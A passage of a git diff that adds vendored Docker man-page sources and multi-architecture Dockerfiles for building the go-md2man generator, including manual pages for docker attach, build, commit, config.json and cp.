/go/src /go/bin /go/pkg +ENV GOPATH=/go +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.armhf b/vendor/github.com/docker/docker/man/Dockerfile.armhf new file mode 100644 index 0000000000..e7ea495646 --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.armhf @@ -0,0 +1,43 @@ +FROM armhf/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y \ + git \ + bash \ + curl \ + gcc \ + make + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# We're building for armhf, which is ARMv7, so let's be explicit about that +ENV GOARCH arm +ENV GOARM 7 + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le new file mode 100644 index 0000000000..fc96ca7691 --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le @@ -0,0 +1,35 @@ +FROM ppc64le/ubuntu:xenial + +RUN apt-get update && apt-get install -y \ + curl \ + gcc \ + git \ + make \ + tar + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /usr/local/go/bin:$PATH +ENV GOPATH=/go + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.s390x b/vendor/github.com/docker/docker/man/Dockerfile.s390x new file mode 100644 index 0000000000..d4bcf1da11 --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.s390x @@ -0,0 +1,35 @@ +FROM s390x/ubuntu:xenial + +RUN apt-get update && apt-get install -y \ + curl \ + gcc \ + git \ + make \ + tar + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /usr/local/go/bin:$PATH +ENV GOPATH=/go + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/README.md b/vendor/github.com/docker/docker/man/README.md new file mode 100644 index 0000000000..82dac650f9 --- /dev/null +++ b/vendor/github.com/docker/docker/man/README.md @@ -0,0 +1,15 @@ +Docker Documentation +==================== + +This directory contains scripts for generating the man pages. Many of the man +pages are generated directly from the `spf13/cobra` `Command` definition. Some +legacy pages are still generated from the markdown files in this directory. +Do *not* edit the man pages in the man1 directory. Instead, update the +Cobra command or amend the Markdown files for legacy pages. + + +## Generate the man pages + +From within the project root directory run: + + make manpages diff --git a/vendor/github.com/docker/docker/man/docker-attach.1.md b/vendor/github.com/docker/docker/man/docker-attach.1.md new file mode 100644 index 0000000000..c39d1c9290 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-attach.1.md @@ -0,0 +1,99 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-attach - Attach to a running container + +# SYNOPSIS +**docker attach** +[**--detach-keys**[=*[]*]] +[**--help**] +[**--no-stdin**] +[**--sig-proxy**[=*true*]] +CONTAINER + +# DESCRIPTION +The **docker attach** command allows you to attach to a running container using +the container's ID or name, either to view its ongoing output or to control it +interactively. You can attach to the same contained process multiple times +simultaneously, screen sharing style, or quickly view the progress of your +detached process. + +To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the +container. You can detach from the container (and leave it running) using a +configurable key sequence. The default sequence is `CTRL-p CTRL-q`. You +configure the key sequence using the **--detach-keys** option or a configuration +file. See **config-json(5)** for documentation on using a configuration file. + +It is forbidden to redirect the standard input of a `docker attach` command while +attaching to a tty-enabled container (i.e.: launched with `-t`). + +# OPTIONS +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**--help** + Print usage statement + +**--no-stdin**=*true*|*false* + Do not attach STDIN. The default is *false*. + +**--sig-proxy**=*true*|*false* + Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied. The default is *true*. + +# Override the detach sequence + +If you want, you can configure an override the Docker key sequence for detach. +This is useful if the Docker default sequence conflicts with key sequence you +use for other applications. There are two ways to define your own detach key +sequence, as a per-container override or as a configuration property on your +entire configuration. + +To override the sequence for an individual container, use the +`--detach-keys=""` flag with the `docker attach` command. The format of +the `` is either a letter [a-Z], or the `ctrl-` combined with any of +the following: + +* `a-z` (a single lowercase alpha character ) +* `@` (at sign) +* `[` (left bracket) +* `\\` (two backward slashes) +* `_` (underscore) +* `^` (caret) + +These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key +sequences. To configure a different configuration default key sequence for all +containers, see **docker(1)**. + +# EXAMPLES + +## Attaching to a container + +In this example the top command is run inside a container, from an image called +fedora, in detached mode. The ID from the container is passed into the **docker +attach** command: + + # ID=$(sudo docker run -d fedora /usr/bin/top -b) + # sudo docker attach $ID + top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355560k used, 18012k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221740k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top + + top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355244k used, 18328k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221776k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-build.1.md b/vendor/github.com/docker/docker/man/docker-build.1.md new file mode 100644 index 0000000000..4beee88e4a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-build.1.md @@ -0,0 +1,340 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-build - Build an image from a Dockerfile + +# SYNOPSIS +**docker build** +[**--build-arg**[=*[]*]] +[**--cpu-shares**[=*0*]] +[**--cgroup-parent**[=*CGROUP-PARENT*]] +[**--help**] +[**-f**|**--file**[=*PATH/Dockerfile*]] +[**-squash**] *Experimental* +[**--force-rm**] +[**--isolation**[=*default*]] +[**--label**[=*[]*]] +[**--no-cache**] +[**--pull**] +[**--compress**] +[**-q**|**--quiet**] +[**--rm**[=*true*]] +[**-t**|**--tag**[=*[]*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--memory-swap**[=*LIMIT*]] +[**--network**[=*"default"*]] +[**--shm-size**[=*SHM-SIZE*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**--ulimit**[=*[]*]] +PATH | URL | - + +# DESCRIPTION +This will read the Dockerfile from the directory specified in **PATH**. +It also sends any other files and directories found in the current +directory to the Docker daemon. The contents of this directory would +be used by **ADD** commands found within the Dockerfile. + +Warning, this will send a lot of data to the Docker daemon depending +on the contents of the current directory. The build is run by the Docker +daemon, not by the CLI, so the whole context must be transferred to the daemon. +The Docker CLI reports "Sending build context to Docker daemon" when the context is sent to +the daemon. + +When the URL to a tarball archive or to a single Dockerfile is given, no context is sent from +the client to the Docker daemon. In this case, the Dockerfile at the root of the archive and +the rest of the archive will get used as the context of the build. When a Git repository is +set as the **URL**, the repository is cloned locally and then sent as the context. + +# OPTIONS +**-f**, **--file**=*PATH/Dockerfile* + Path to the Dockerfile to use. If the path is a relative path and you are + building from a local directory, then the path must be relative to that + directory. If you are building from a remote URL pointing to either a + tarball or a Git repository, then the path must be relative to the root of + the remote context. In all cases, the file must be within the build context. + The default is *Dockerfile*. + +**--squash**=*true*|*false* + **Experimental Only** + Once the image is built, squash the new layers into a new image with a single + new layer. Squashing does not destroy any existing image, rather it creates a new + image with the content of the squshed layers. This effectively makes it look + like all `Dockerfile` commands were created with a single layer. The build + cache is preserved with this method. + + **Note**: using this option means the new image will not be able to take + advantage of layer sharing with other images and may use significantly more + space. + + **Note**: using this option you may see significantly more space used due to + storing two copies of the image, one for the build cache with all the cache + layers in tact, and one for the squashed version. + +**--build-arg**=*variable* + name and value of a **buildarg**. + + For example, if you want to pass a value for `http_proxy`, use + `--build-arg=http_proxy="http://some.proxy.url"` + + Users pass these values at build-time. Docker uses the `buildargs` as the + environment context for command(s) run via the Dockerfile's `RUN` instruction + or for variable expansion in other Dockerfile instructions. This is not meant + for passing secret values. [Read more about the buildargs instruction](https://docs.docker.com/engine/reference/builder/#arg) + +**--force-rm**=*true*|*false* + Always remove intermediate containers, even after unsuccessful builds. The default is *false*. + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. + +**--label**=*label* + Set metadata for an image + +**--no-cache**=*true*|*false* + Do not use cache when building the image. The default is *false*. + +**--help** + Print usage statement + +**--pull**=*true*|*false* + Always attempt to pull a newer version of the image. The default is *false*. + +**--compress**=*true*|*false* + Compress the build context using gzip. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Suppress the build output and print image ID on success. The default is *false*. + +**--rm**=*true*|*false* + Remove intermediate containers after a successful build. The default is *true*. + +**-t**, **--tag**="" + Repository names (and optionally with tags) to be applied to the resulting + image in case of success. Refer to **docker-tag(1)** for more information + about valid tag names. + +**-m**, **--memory**=*MEMORY* + Memory limit + +**--memory-swap**=*LIMIT* + A limit value equal to memory plus swap. Must be used with the **-m** +(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** +(**--memory**) value. + + The format of `LIMIT` is `[]`. Unit can be `b` (bytes), +`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a +unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. + +**--network**=*bridge* + Set the networking mode for the RUN instructions during build. Supported standard + values are: `bridge`, `host`, `none` and `container:`. Any other value + is taken as a custom network's name or ID which this container should connect to. + +**--shm-size**=*SHM-SIZE* + Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. + If you omit the size entirely, the system uses `64m`. + +**--cpu-shares**=*0* + CPU shares (relative weight). + + By default, all containers get the same proportion of CPU cycles. + CPU shares is a 'relative weight', relative to the default setting of 1024. + This default value is defined here: + ``` + cat /sys/fs/cgroup/cpu/cpu.shares + 1024 + ``` + You can change this proportion by adjusting the container's CPU share + weighting relative to the weighting of all other running containers. + + To modify the proportion from the default of 1024, use the **--cpu-shares** + flag to set the weighting to 2 or higher. + + Container CPU share Flag + {C0} 60% of CPU --cpu-shares=614 (614 is 60% of 1024) + {C1} 40% of CPU --cpu-shares=410 (410 is 40% of 1024) + + The proportion is only applied when CPU-intensive processes are running. + When tasks in one container are idle, the other containers can use the + left-over CPU time. The actual amount of CPU time used varies depending on + the number of containers running on the system. + + For example, consider three containers, where one has **--cpu-shares=1024** and + two others have **--cpu-shares=512**. When processes in all three + containers attempt to use 100% of CPU, the first container would receive + 50% of the total CPU time. If you add a fourth container with **--cpu-shares=1024**, + the first container only gets 33% of the CPU. The remaining containers + receive 16.5%, 16.5% and 33% of the CPU. + + + Container CPU share Flag CPU time + {C0} 100% --cpu-shares=1024 33% + {C1} 50% --cpu-shares=512 16.5% + {C2} 50% --cpu-shares=512 16.5% + {C4} 100% --cpu-shares=1024 33% + + + On a multi-core system, the shares of CPU time are distributed across the CPU + cores. Even if a container is limited to less than 100% of CPU time, it can + use 100% of each individual CPU core. + + For example, consider a system with more than three cores. If you start one + container **{C0}** with **--cpu-shares=512** running one process, and another container + **{C1}** with **--cpu-shares=1024** running two processes, this can result in the following + division of CPU shares: + + PID container CPU CPU share + 100 {C0} 0 100% of CPU0 + 101 {C1} 1 100% of CPU1 + 102 {C1} 2 100% of CPU2 + +**--cpu-period**=*0* + Limit the CPU CFS (Completely Fair Scheduler) period. + + Limit the container's CPU usage. This flag causes the kernel to restrict the + container's CPU usage to the period you specify. + +**--cpu-quota**=*0* + Limit the CPU CFS (Completely Fair Scheduler) quota. + + By default, containers run with the full CPU resource. This flag causes the +kernel to restrict the container's CPU usage to the quota you specify. + +**--cpuset-cpus**=*CPUSET-CPUS* + CPUs in which to allow execution (0-3, 0,1). + +**--cpuset-mems**=*CPUSET-MEMS* + Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on + NUMA systems. + + For example, if you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` +to ensure the processes in your Docker container only use memory from the first +two memory nodes. + +**--cgroup-parent**=*CGROUP-PARENT* + Path to `cgroups` under which the container's `cgroup` are created. + + If the path is not absolute, the path is considered relative to the `cgroups` path of the init process. +Cgroups are created if they do not already exist. + +**--ulimit**=[] + Ulimit options + + For more information about `ulimit` see [Setting ulimits in a +container](https://docs.docker.com/engine/reference/commandline/run/#set-ulimits-in-container---ulimit) + +# EXAMPLES + +## Building an image using a Dockerfile located inside the current directory + +Docker images can be built using the build command and a Dockerfile: + + docker build . + +During the build process Docker creates intermediate images. In order to +keep them, you must explicitly set `--rm=false`. + + docker build --rm=false . + +A good practice is to make a sub-directory with a related name and create +the Dockerfile in that directory. For example, a directory called mongo may +contain a Dockerfile to create a Docker MongoDB image. Likewise, another +directory called httpd may be used to store Dockerfiles for Apache web +server images. + +It is also a good practice to add the files required for the image to the +sub-directory. These files will then be specified with the `COPY` or `ADD` +instructions in the `Dockerfile`. + +Note: If you include a tar file (a good practice), then Docker will +automatically extract the contents of the tar file specified within the `ADD` +instruction into the specified target. + +## Building an image and naming that image + +A good practice is to give a name to the image you are building. Note that +only a-z0-9-_. should be used for consistency. There are no hard rules here but it is best to give the names consideration. + +The **-t**/**--tag** flag is used to rename an image. Here are some examples: + +Though it is not a good practice, image names can be arbitrary: + + docker build -t myimage . + +A better approach is to provide a fully qualified and meaningful repository, +name, and tag (where the tag in this context means the qualifier after +the ":"). In this example we build a JBoss image for the Fedora repository +and give it the version 1.0: + + docker build -t fedora/jboss:1.0 . + +The next example is for the "whenry" user repository and uses Fedora and +JBoss and gives it the version 2.1 : + + docker build -t whenry/fedora-jboss:v2.1 . + +If you do not provide a version tag then Docker will assign `latest`: + + docker build -t whenry/fedora-jboss . + +When you list the images, the image above will have the tag `latest`. + +You can apply multiple tags to an image. For example, you can apply the `latest` +tag to a newly built image and add another tag that references a specific +version. +For example, to tag an image both as `whenry/fedora-jboss:latest` and +`whenry/fedora-jboss:v2.1`, use the following: + + docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . + +So renaming an image is arbitrary but consideration should be given to +a useful convention that makes sense for consumers and should also take +into account Docker community conventions. + + +## Building an image using a URL + +This will clone the specified GitHub repository from the URL and use it +as context. The Dockerfile at the root of the repository is used as +Dockerfile. This only works if the GitHub repository is a dedicated +repository. + + docker build github.com/scollier/purpletest + +Note: You can set an arbitrary Git repository via the `git://` scheme. + +## Building an image using a URL to a tarball'ed context + +This will send the URL itself to the Docker daemon. The daemon will fetch the +tarball archive, decompress it and use its contents as the build context. The +Dockerfile at the root of the archive and the rest of the archive will get used +as the context of the build. If you pass an **-f PATH/Dockerfile** option as well, +the system will look for that file inside the contents of the tarball. + + docker build -f dev/Dockerfile https://10.10.10.1/docker/context.tar.gz + +Note: supported compression formats are 'xz', 'bzip2', 'gzip' and 'identity' (no compression). + +## Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + +* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. +* `process`: Namespace isolation only. +* `hyperv`: Hyper-V hypervisor partition-based isolation. + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. + +# HISTORY +March 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-commit.1.md b/vendor/github.com/docker/docker/man/docker-commit.1.md new file mode 100644 index 0000000000..d8a4cf8387 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-commit.1.md @@ -0,0 +1,71 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-commit - Create a new image from a container's changes + +# SYNOPSIS +**docker commit** +[**-a**|**--author**[=*AUTHOR*]] +[**-c**|**--change**[=\[*DOCKERFILE INSTRUCTIONS*\]]] +[**--help**] +[**-m**|**--message**[=*MESSAGE*]] +[**-p**|**--pause**[=*true*]] +CONTAINER [REPOSITORY[:TAG]] + +# DESCRIPTION +Create a new image from an existing container specified by name or +container ID. The new image will contain the contents of the +container filesystem, *excluding* any data volumes. Refer to **docker-tag(1)** +for more information about valid image and tag names. + +While the `docker commit` command is a convenient way of extending an +existing image, you should prefer the use of a Dockerfile and `docker +build` for generating images that you intend to share with other +people. + +# OPTIONS +**-a**, **--author**="" + Author (e.g., "John Hannibal Smith ") + +**-c** , **--change**=[] + Apply specified Dockerfile instructions while committing the image + Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +**--help** + Print usage statement + +**-m**, **--message**="" + Commit message + +**-p**, **--pause**=*true*|*false* + Pause container during commit. The default is *true*. + +# EXAMPLES + +## Creating a new image from an existing container +An existing Fedora based container has had Apache installed while running +in interactive mode with the bash shell. Apache is also running. To +create a new image run `docker ps` to find the container's ID and then run: + + # docker commit -m="Added Apache to Fedora base image" \ + -a="A D Ministrator" 98bd7fc99854 fedora/fedora_httpd:20 + +Note that only a-z0-9-_. are allowed when naming images from an +existing container. + +## Apply specified Dockerfile instructions while committing the image +If an existing container was created without the DEBUG environment +variable set to "true", you can create a new image based on that +container by first getting the container's ID with `docker ps` and +then running: + + # docker commit -c="ENV DEBUG true" 98bd7fc99854 debug-image + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and in +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +Oct 2014, updated by Daniel, Dao Quang Minh +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-config-json.5.md b/vendor/github.com/docker/docker/man/docker-config-json.5.md new file mode 100644 index 0000000000..49987f08b8 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-config-json.5.md @@ -0,0 +1,72 @@ +% CONFIG.JSON(5) Docker User Manuals +% Docker Community +% JANUARY 2016 +# NAME +HOME/.docker/config.json - Default Docker configuration file + +# INTRODUCTION + +By default, the Docker command line stores its configuration files in a +directory called `.docker` within your `$HOME` directory. Docker manages most of +the files in the configuration directory and you should not modify them. +However, you *can modify* the `config.json` file to control certain aspects of +how the `docker` command behaves. + +Currently, you can modify the `docker` command behavior using environment +variables or command-line options. You can also use options within +`config.json` to modify some of the same behavior. When using these +mechanisms, you must keep in mind the order of precedence among them. Command +line options override environment variables and environment variables override +properties you specify in a `config.json` file. + +The `config.json` file stores a JSON encoding of several properties: + +* The `HttpHeaders` property specifies a set of headers to include in all messages +sent from the Docker client to the daemon. Docker does not try to interpret or +understand these header; it simply puts them into the messages. Docker does not +allow these headers to change any headers it sets for itself. + +* The `psFormat` property specifies the default format for `docker ps` output. +When the `--format` flag is not provided with the `docker ps` command, +Docker's client uses this property. If this property is not set, the client +falls back to the default table format. For a list of supported formatting +directives, see **docker-ps(1)**. + +* The `detachKeys` property specifies the default key sequence which +detaches the container. When the `--detach-keys` flag is not provide +with the `docker attach`, `docker exec`, `docker run` or `docker +start`, Docker's client uses this property. If this property is not +set, the client falls back to the default sequence `ctrl-p,ctrl-q`. + + +* The `imagesFormat` property specifies the default format for `docker images` +output. When the `--format` flag is not provided with the `docker images` +command, Docker's client uses this property. If this property is not set, the +client falls back to the default table format. For a list of supported +formatting directives, see **docker-images(1)**. + +You can specify a different location for the configuration files via the +`DOCKER_CONFIG` environment variable or the `--config` command line option. If +both are specified, then the `--config` option overrides the `DOCKER_CONFIG` +environment variable: + + docker --config ~/testconfigs/ ps + +This command instructs Docker to use the configuration files in the +`~/testconfigs/` directory when running the `ps` command. + +## Examples + +Following is a sample `config.json` file: + + { + "HttpHeaders": { + "MyHeader": "MyValue" + }, + "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", + "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", + "detachKeys": "ctrl-e,e" + } + +# HISTORY +January 2016, created by Moxiegirl diff --git a/vendor/github.com/docker/docker/man/docker-cp.1.md b/vendor/github.com/docker/docker/man/docker-cp.1.md new file mode 100644 index 0000000000..949d60bb8b --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-cp.1.md @@ -0,0 +1,175 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-cp - Copy files/folders between a container and the local filesystem. + +# SYNOPSIS +**docker cp** +[**--help**] +CONTAINER:SRC_PATH DEST_PATH|- + +**docker cp** +[**--help**] +SRC_PATH|- CONTAINER:DEST_PATH + +# DESCRIPTION + +The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. +You can copy from the container's file system to the local machine or the +reverse, from the local filesystem to the container. If `-` is specified for +either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from +`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. +The `SRC_PATH` or `DEST_PATH` can be a file or directory. + +The `docker cp` command assumes container paths are relative to the container's +`/` (root) directory. This means supplying the initial forward slash is optional; +The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and +`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can +be an absolute or relative value. The command interprets a local machine's +relative paths as relative to the current working directory where `docker cp` is +run. + +The `cp` command behaves like the Unix `cp -a` command in that directories are +copied recursively with permissions preserved if possible. Ownership is set to +the user and primary group at the destination. For example, files copied to a +container are created with `UID:GID` of the root user. Files copied to the local +machine are created with the `UID:GID` of the user which invoked the `docker cp` +command. If you specify the `-L` option, `docker cp` follows any symbolic link +in the `SRC_PATH`. `docker cp` does *not* create parent directories for +`DEST_PATH` if they do not exist. + +Assuming a path separator of `/`, a first argument of `SRC_PATH` and second +argument of `DEST_PATH`, the behavior is as follows: + +- `SRC_PATH` specifies a file + - `DEST_PATH` does not exist + - the file is saved to a file created at `DEST_PATH` + - `DEST_PATH` does not exist and ends with `/` + - Error condition: the destination directory must exist. + - `DEST_PATH` exists and is a file + - the destination is overwritten with the source file's contents + - `DEST_PATH` exists and is a directory + - the file is copied into this directory using the basename from + `SRC_PATH` +- `SRC_PATH` specifies a directory + - `DEST_PATH` does not exist + - `DEST_PATH` is created as a directory and the *contents* of the source + directory are copied into this directory + - `DEST_PATH` exists and is a file + - Error condition: cannot copy a directory to a file + - `DEST_PATH` exists and is a directory + - `SRC_PATH` does not end with `/.` + - the source directory is copied into this directory + - `SRC_PATH` does end with `/.` + - the *content* of the source directory is copied into this + directory + +The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above +rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not +the target, is copied by default. To copy the link target and not the link, +specify the `-L` option. + +A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can +also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local +machine, for example `file:name.txt`. If you use a `:` in a local machine path, +you must be explicit with a relative or absolute path, for example: + + `/path/to/file:name.txt` or `./file:name.txt` + +It is not possible to copy certain system files such as resources under +`/proc`, `/sys`, `/dev`, tmpfs, and mounts created by the user in the container. +However, you can still copy such files by manually running `tar` in `docker exec`. +For example (consider `SRC_PATH` and `DEST_PATH` are directories): + + $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - + +or + + $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - + + +Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. +The command extracts the content of the tar to the `DEST_PATH` in container's +filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as +the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. + +# OPTIONS +**-L**, **--follow-link**=*true*|*false* + Follow symbol link in SRC_PATH + +**--help** + Print usage statement + +# EXAMPLES + +Suppose a container has finished producing some output as a file it saves +to somewhere in its filesystem. This could be the output of a build job or +some other computation. You can copy these outputs from the container to a +location on your local host. + +If you want to copy the `/tmp/foo` directory from a container to the +existing `/tmp` directory on your host. If you run `docker cp` in your `~` +(home) directory on the local host: + + $ docker cp compassionate_darwin:tmp/foo /tmp + +Docker creates a `/tmp/foo` directory on your host. Alternatively, you can omit +the leading slash in the command. If you execute this command from your home +directory: + + $ docker cp compassionate_darwin:tmp/foo tmp + +If `~/tmp` does not exist, Docker will create it and copy the contents of +`/tmp/foo` from the container into this new directory. If `~/tmp` already +exists as a directory, then Docker will copy the contents of `/tmp/foo` from +the container into a directory at `~/tmp/foo`. + +When copying a single file to an existing `LOCALPATH`, the `docker cp` command +will either overwrite the contents of `LOCALPATH` if it is a file or place it +into `LOCALPATH` if it is a directory, overwriting an existing file of the same +name if one exists. For example, this command: + + $ docker cp sharp_ptolemy:/tmp/foo/myfile.txt /test + +If `/test` does not exist on the local machine, it will be created as a file +with the contents of `/tmp/foo/myfile.txt` from the container. If `/test` +exists as a file, it will be overwritten. Lastly, if `/test` exists as a +directory, the file will be copied to `/test/myfile.txt`. + +Next, suppose you want to copy a file or folder into a container. For example, +this could be a configuration file or some other input to a long running +computation that you would like to place into a created container before it +starts. This is useful because it does not require the configuration file or +other input to exist in the container image. + +If you have a file, `config.yml`, in the current directory on your local host +and wish to copy it to an existing directory at `/etc/my-app.d` in a container, +this command can be used: + + $ docker cp config.yml myappcontainer:/etc/my-app.d + +If you have several files in a local directory `/config` which you need to copy +to a directory 